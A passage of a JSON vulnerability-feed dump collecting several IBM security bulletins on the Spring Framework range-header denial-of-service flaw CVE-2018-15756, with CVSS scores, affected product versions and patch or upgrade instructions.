Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-06T17:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Spring Framework vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-05-06T17:30:01", "id": "43F13A59BAC727291BE408250411526C9C997271C9B4A25BD10C74E510C0D8CA", "href": "https://www.ibm.com/support/pages/node/883612", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:48:24", "description": "## Summary\n\nThe Spring framework is vulnerable to a security issue affecting the Rational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nRational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench versions:\n\n * 9.2.1\n * 9.2.1.1\n\nVersions prior to these are unaffected.\n\n## Remediation/Fixes\n\nThe fix for the CVE mentioned above has been incorporated into the release of Apache Tomcat. You should upgrade your installation by following the instructions below:\n\n1 .Verify the version of Rational Test Control Panel that you have\n\n2\\. Download the fix for your product from Fix Central, this can be obtained for either Rational Test Workbench or Rational Test Virtualization Server by selecting the product and relevant version before browsing for fixes. Select and download the cve201815756-ifix for your selected product.\n\n3\\. Stop the server. \n\n4\\. Navigate to the existing RTCP installation \nThe default installation locations for these files are:\n\n * Windows: `C:\\Program Files\\IBM\\RationalTestControlPanel\\`\n * AIX, Linux, Solaris: `/opt/IBM/RationalTestControlPanel/`\n\n5\\. Copy the contents of the \"usr\" directory as a backup\n\n6\\. Unzip the download fix into the `RationalTestControlPanel` directory, overwriting the existing files. \n7\\. Start the server. \n \n**Notes:**\n\n * Full details of the installation steps are included in the readme that ships with the fix\n * When removing an installation that has had the security fix applied, not all the files will be removed by IBM Installation Manager, and some files will have to be removed manually.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-03-27T18:50:01", "type": "ibm", "title": "Security Bulletin: Rational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench affected by Spring vulnerability (CVE-2018-15756)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-03-27T18:50:01", "id": "6E88634D87E3E5B251BBC5EEC31421F5AFA769921EB926A90E16BDEAE4733D94", "href": "https://www.ibm.com/support/pages/node/874742", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:49:05", "description": "## Summary\n\nFileNet Content Management Interoperability Services (CMIS), which ships with IBM Content Navigator, is affected by the following vulnerability: \n \nSpring Framework\u2019s improper handling of ResourceHttpRequestHandler could result in denial of service condition.\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM ECM CMIS and FileNet Collaboration Services 3.0.4\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_** | **_Remediation/First Fix_** \n---|---|--- \nIBM ECM CMIS and FileNet Collaboration Services | 3.0.4 | Download the fix IBM ECM CMIS and CS 3.0.4-iFix005 from IBM Fix central ( <https://www.ibm.com/support/fixcentral/> ) \n \n## Workarounds and Mitigations\n\nFileNet Content Management Interoperability Services (CMIS), shipped with IBM Content Navigator, is vulnerable to Denial of Service (DoS) due to improper handling of range request by the ResourceHttpRequestHandler in the Spring Framework. When an attacker adds a range of headers, with a high number of range values to the request object, the framework results in DoS. \nFixed the FileNet Content Management Interoperability Services (CMIS) by upgrading the Spring Framework to version 4.3.22\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-28T05:15:02", "type": "ibm", "title": "Security Bulletin: FileNet CMIS (FNCMIS) leveraging Spring Framework is vulnerable to a denial of service caused by improper handling of range request by the ResourceHttpRequestHandler", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-02-28T05:15:02", "id": "8D2949E636F5D575715D428D75938522A464633507BFA031FADA44B5529A4EA3", "href": "https://www.ibm.com/support/pages/node/872210", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:49:12", "description": "## Summary\n\nPublic disclosed vulnerability from Spring Framework affects IBM Spectrum LSF Explorer\n\n## Vulnerability Details\n\n**CVE-ID:**CVE-2018-15756 \n**Description**: Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nSpectrum LSF Explorer 10.2, 10.2.0.6, 10.2.0.7\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nSpectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \nSpectrum LSF Explorer\n\n| \n\n_10.2.0.6_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \nSpectrum LSF Explorer\n\n| \n\n_10.2.0.7_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \n## Workarounds and Mitigations\n\n**Spectrum LSF Explorer 10.2 & 10.2.0.6 & 10.2.0.7**\n\n 1. Download Spring Framework 4.3.22 from following link, https://repo.spring.io/release/org/springframework/spring/4.3.22.RELEASE/spring-framework-4.3.22.RELEASE-dist.zip\n 2. Replace the downloaded files (spring-context-support-4.3.22.RELEASE.jar, spring-beans-4.3.22.RELEASE.jar, spring-context-4.3.22.RELEASE.jar, spring-expression-4.3.22.RELEASE.jar, spring-web-4.3.22.RELEASE.jar, spring-core-4.3.22.RELEASE.jar, spring-aop-4.3.22.RELEASE.jar, spring-context-support-4.3.22.RELEASE.jar, spring-jdbc-4.3.22.RELEASE.jar, spring-beans-4.3.22.RELEASE.jar, spring-context-4.3.22.RELEASE.jar, spring-expression-4.3.22.RELEASE.jar, spring-web-4.3.22.RELEASE.jar, spring-core-4.3.22.RELEASE.jar, spring-webmvc-4.3.22.RELEASE.jar, spring-aop-4.3.22.RELEASE.jar, spring-orm-4.3.22.RELEASE.jar, spring-tx-4.3.22.RELEASE.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to Spectrum LSF Explorer Server installed directory\n * run command \u2018find . -name \"*spring*4.3.2*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-22T05:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Spring Framework affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-02-22T05:15:02", "id": "E3869F4C02C08AC1155CA8A6E5BB7EC506A36415CBAD32ECC32204DE9005D1E1", "href": "https://www.ibm.com/support/pages/node/869242", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:49:12", "description": "## Summary\n\nPublic disclosed vulnerability from Spring Framework affects IBM Spectrum LSF Application Center\n\n## Vulnerability Details\n\n**CVE-ID:**CVE-2018-15756 \n**Description**: Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nSpectrum LSF Application Center 10.2, 10.2.0.6, 10.2.0.7\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nSpectrum LSF Application Center\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \nSpectrum LSF Application Center\n\n| \n\n_10.2.0.6_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \nSpectrum LSF Application Center\n\n| \n\n_10.2.0.7_\n\n| \n\n_None_\n\n| \n\n_See workaround_ \n \n## Workarounds and Mitigations\n\n**Spectrum LSF Application Center 10.2 & 10.2.0.6 & 10.2.0.7**\n\n 1. Download Spring Framework 4.3.22 from following link, https://repo.spring.io/release/org/springframework/spring/4.3.22.RELEASE/spring-framework-4.3.22.RELEASE-dist.zip\n 2. Replace the downloaded files (spring-context-support-4.3.22.RELEASE.jar, spring-beans-4.3.22.RELEASE.jar, spring-context-4.3.22.RELEASE.jar, spring-expression-4.3.22.RELEASE.jar, spring-web-4.3.22.RELEASE.jar, spring-core-4.3.22.RELEASE.jar, spring-aop-4.3.22.RELEASE.jar, spring-context-support-4.3.22.RELEASE.jar, spring-jdbc-4.3.22.RELEASE.jar, spring-beans-4.3.22.RELEASE.jar, spring-context-4.3.22.RELEASE.jar, spring-expression-4.3.22.RELEASE.jar, spring-web-4.3.22.RELEASE.jar, spring-core-4.3.22.RELEASE.jar, spring-webmvc-4.3.22.RELEASE.jar, spring-aop-4.3.22.RELEASE.jar, spring-orm-4.3.22.RELEASE.jar, spring-tx-4.3.22.RELEASE.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to Spectrum LSF Application Center installed directory\n * run command \u2018find . -name \"*spring*4.3.2*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-22T05:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Spring Framework affects IBM Spectrum LSF Application Center", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-02-22T05:15:02", "id": "F1A5F6091AC266EC33D7CCAE08C6C698F9EF4A1CD8A30C60466EB7C309A920FD", "href": "https://www.ibm.com/support/pages/node/869240", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:40:12", "description": "## Summary\n\nVulnerability in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager.\n\n## Vulnerability Details\n\nCVE-ID: [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \nDescription: Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/151641_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151641>)for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nTADDM 7.3.0.3 - 7.3.0.6\n\n## Remediation/Fixes\n\nThere are eFixes prepared on top of each of the Fixpacks which are affected by this vulnerability. If you have no eFixes installed on the given FixPack level, go ahead and download the eFix from the links given below. However, if you have eFixes installed on a given Fixpack level, please contact support for having a custom eFix built for your eFix level.\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \n \nefix_IJ15471_FP6190313.zip\n\n| 7.3.0.6 | None | [_Download eFix_](<https://www.secure.ecurep.ibm.com/download/?id=a1CTUnP5DdZV0kKtpRNgTVtxDSI8vTCy68DCxmRzms0>) \nefix_IJ15471_FP5180802.zip | 7.3.0.5 | None | [_Download eFix_](<https://www.secure.ecurep.ibm.com/download/?id=1gEDMApOI55d5H5U7DoXexOFjRE8IfZki64l0JJh48k>) \nefix_IJ15471_FP420171214.zip | 7.3.0.4 | None | _[Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=NupEe5fQpecrIaPaVKFCB1E5OBfWkTOxXM4PTaXC3tQ>)_ \nefix_IJ15471_FP320160323.zip | 7.3.0.3 | None | _[Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=qCyxdFk7Zo1Cd50U6chfsgyUCpDrxp6Iys9qScUdFlk>)_ \n \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-22T17:46:55", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2018-15756)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2020-05-22T17:46:55", "id": "27E180ADFDF8C2A27C31E9AFA35796F63C9D1F335CD31C4846FD3EA8A8520BA9", "href": "https://www.ibm.com/support/pages/node/881986", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:45:27", "description": "## Summary\n\nOpen source Spring Framework as used in IBM QRadar SIEM is vulnerable to a denial of service\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**Description: **Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \n**CVSS Base Score: **7.5 \n**CVSS Temporal Score: ** See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \n**CVSS Environmental Score: ***Undefined \n**CVSS Vector: **CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H \n\n\n## Affected Products and Versions\n\n\u00b7 IBM QRadar 7.3 to 7.3.2 Patch 1\n\n\u00b7 IBM QRadar 7.2 to 7.2.8 Patch 15\n\n## Remediation/Fixes\n\n[_IBM QRadar/QRM/QVM/QRIF/QNI 7.3.2 Patch 2_](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=All&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20190522204210&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true>)\n\n[_IBM QRadar/QRM/QVM/QRIF/QNI 7.2.8 Patch 16_](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Vulnerability+Manager&release=7.2.0&platform=All&function=fixId&fixids=QRadarFix-728-QRSIEM-20190703194519&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-10T15:40:02", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is vulnerable to a publicly disclosed vulnerability in Spring Framework (CVE-2018-15756)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-07-10T15:40:02", "id": "0FD3FDF21CFF3DBE72CCB3FFEE1437FD1C08437920990F637E83CA6099599BBC", "href": "https://www.ibm.com/support/pages/node/957141", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:45:44", "description": "## Summary\n\nSecurity vulnerability affects IBM Watson Explorer Foundational Components.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nThe vulnerability applies to the following product and version:\n\n * Watson Explorer Foundational Components versions 12.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2\n * Watson Explorer Foundational Components versions 11.0.2.0 - 11.0.2.4\n\n## Remediation/Fixes\n\nFollow these steps to upgrade to the required version of Spring Framework. \n \nThe table reflects product names at the time the specified versions were released. To use the links to Fix Central in this table, you must first log in to the IBM Support: Fix Central site at <http://www.ibm.com/support/fixcentral/>. \n\n**Affected Product** | **Affected Versions** | **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer DAE \nFoundational Components | 12.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2 | \n\nUpgrade to Version 12.0.3. \n\nSee [Watson Explorer Version 12.0.3 Foundational Components](<https://www.ibm.com/support/docview.wss?uid=ibm10880809>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components | \n\n11.0.2.0 - 11.0.2.4\n\n| \n\nUpgrade to Version 11.0.2.5. \n \nSee [Watson Explorer Version 11.0.2.5 Foundational Components](<https://www.ibm.com/support/docview.wss?uid=ibm10878092>) for download information and instructions. \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-06-28T15:35:01", "type": "ibm", "title": "Security Bulletin: Vulnerability affects Watson Explorer Foundational Components (CVE-2018-15756)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-06-28T15:35:01", "id": "5A13B314353CA3E9B7AD6D9270BC22099A054DD9D9A767CA3104504F5F89BE75", "href": "https://www.ibm.com/support/pages/node/882008", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:47:24", "description": "## Summary\n\nA Security vulnerability in Spring Framework, from Pivotal, used by IBM Rational License Key Server Administration & Reporting Tool has been published. Required remediation has been addressed by IBM Rational License Key Server Administration & Reporting Tool team.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-15756](<https://pivotal.io/security/cve-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n## Affected Products and Versions\n\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.1\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.2\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.3\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.4\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.5\n * IBM Rational License Key Server Administration & Reporting Tool version 8.1.5.6\n\n## Remediation/Fixes\n\nUpgrade to the IBM Rational License Key Server Administration & Reporting Tool version 8.1.6 (or later). It can be downloaded [here](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?product=ibm/Rational/Rational+Common+Licensing&release=All&platform=All&function=fixId&fixids=IBM_RLKS_Administration_And_Reporting_Tool_816&includeRequisites=1&includeSupersedes=0&downloadMethod=http>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-04-24T16:50:01", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Pivotal Spring Framework affects IBM Rational License Key Server Administration & Reporting Tool", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2019-04-24T16:50:01", "id": "F09158237D18252B177A749B61E3B7D3CC4F088101F64ADF45821DB911D8AD10", "href": "https://www.ibm.com/support/pages/node/879027", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:46:58", "description": "## Summary\n\nPivotal Spring Framework, used by IBM 